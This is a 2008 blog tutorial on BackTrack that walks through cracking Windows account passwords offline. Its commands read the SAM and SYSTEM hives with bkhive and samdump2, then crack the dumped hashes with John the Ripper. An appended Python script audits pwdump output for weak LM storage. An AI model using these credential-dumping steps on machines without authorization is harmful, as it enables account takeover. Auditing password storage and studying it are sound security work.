Tuesday, September 2, 2008

Crack Windows Password With Back|track

BackTrack is the top-rated Linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-ROM and is fully accessible within minutes.

It evolved from the merger of two widespread distributions, Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack gained massive popularity and was voted the #1 Security Live Distribution by insecure.org in 2006. Security professionals as well as newcomers all over the globe use BackTrack as their favorite toolset.

BackTrack has a long history and was based on many different Linux distributions; it is now based on Slackware Linux and the corresponding live-CD scripts by Tomas M. (www.slax.org). Every package, kernel configuration and script is optimized for use by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

After settling into a stable development process during the last releases and consolidating feedback and additions, the team focused on supporting more and newer hardware, and on providing more flexibility and modularity by restructuring the build and maintenance processes. In the current version, most applications are built as individual modules, which speeds up maintenance releases and fixes.

Because Metasploit is one of the key tools for most analysts, it is tightly integrated into BackTrack, and both projects collaborate to always provide a cutting-edge implementation of Metasploit within the BackTrack CD-ROM images or the upcoming virtualization images (such as VMware appliances) distributed and maintained by remote-exploit.org.

Being superior while staying easy to use is key to a good security live CD. We took things a step further and aligned BackTrack with penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.

Currently BackTrack consists of more than 300 different up-to-date tools, logically structured according to the workflow of security professionals. This structure allows even newcomers to find the tools related to a certain task. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up to date. (From: Remote-Exploit.)

Now we crack a Windows password with Back|track.

Step one: boot from the BackTrack CD and log in:

User : root
Password : toor

then open a terminal and run the command:

bt~# mount

This command checks the Windows partition: whether BackTrack can read it or not.

Now look at line 5: [ /dev/hda1 on /mnt/hda1 type ntfs (ro,noatime) ]
This means the NTFS partition has been mounted on the directory /mnt/hda1, so we can now access the Windows files
from BackTrack. The partition is mounted with "read only" access [ro], meaning we cannot change or
write anything in this directory.

Now we access the Windows password directory [ \WINDOWS\system32\config\ ]:

bt~# ls -l /mnt/hda1/WINDOWS/system32/config/sam

Now our mission is to get the syskey. To get it we can use the bkhive program:
bt~# bkhive /mnt/hda1/WINDOWS/system32/config/system my_syskey

bt~# ls -l

Windows stores the passwords in the SAM file, encrypted by the Windows system.
Now we try to get the hashes out of the Windows SAM file.
What program do we use? We can use "samdump2", which is packaged in BackTrack:

bt~# samdump2 /mnt/hda1/WINDOWS/system32/config/sam my_syskey

Look at this screenshot... we got the hash values of the Windows passwords.
Now we must crack them with ophcrack or John the Ripper; in this case I use John the Ripper for cracking :)

First we must save the password hashes to a txt file with the command:

bt~# samdump2 /mnt/hda1/WINDOWS/system32/config/sam my_syskey > hash.txt

bt~# ls -l

Now the hashes have been saved in a txt file named "hash.txt".

Now John the Ripper is ready for cracking:

bt~# /pentest/password/john-1.7.2/run/john hash.txt

bt~# cat /pentest/password/john-1.7.2/run/john.pot

Oops, the password was found [ POTONGAN ]... but I don't understand why John the Ripper separated
the last letter [ N ].

But we can show the password again with the command:

bt~# /pentest/password/john-1.7.2/run/john --show hash.txt

Done... happy cracking :) and sorry about my bad English!
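The reason john lists POTONGA and N separately is that the LM hash stores a password as two independent 7-character halves, so each half is cracked on its own and --show joins them. As an added example that is not part of the original post, the Python below parses samdump2's pwdump-style output (constructed sample lines; the non-empty hashes are placeholders) and flags, for an auditor, accounts that still store an LM hash, whose second LM half is the empty-half constant (password of 7 characters or fewer), or whose NT hash is that of the empty password.

```python
import re
from dataclasses import dataclass
from typing import List

# LM hash of the empty password: what Windows stores when no LM hash is kept
# (NoLMHash policy, or a password longer than 14 characters). Each 16-hex-char
# half is the DES-encrypted constant for an empty 7-character half.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
# NT hash (MD4 of the UTF-16LE password) of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump-style line as printed by samdump2: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):")

@dataclass
class Finding:
    user: str
    rid: int
    lm_stored: bool       # LM hash present: crackable as two 7-char halves
    short_password: bool  # second LM half is the empty-half constant: password <= 7 chars
    blank_password: bool  # NT hash equals the empty-password hash

def audit_pwdump(dump: str) -> List[Finding]:
    """Parse pwdump-style lines and flag weak credential storage per account."""
    findings = []
    for line in dump.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:  # skip blank lines and anything that is not a hash line
            continue
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        lm_stored = lm != EMPTY_LM
        findings.append(Finding(
            user=user, rid=rid, lm_stored=lm_stored,
            short_password=lm_stored and lm[16:] == EMPTY_LM_HALF,
            blank_password=nt == EMPTY_NT,
        ))
    return findings

# Constructed sample dump; the non-empty hashes are placeholders, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""

if __name__ == "__main__":
    for finding in audit_pwdump(SAMPLE_DUMP):
        print(finding)
```

Any account with lm_stored set is the one to fix first: enabling the NoLMHash policy (and changing the password so the old LM hash is dropped) removes the two-halves weakness entirely.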

